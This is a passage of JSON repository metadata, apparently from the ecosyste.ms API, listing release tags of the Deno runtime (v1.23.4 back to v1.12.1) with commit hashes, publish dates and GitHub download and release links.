v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@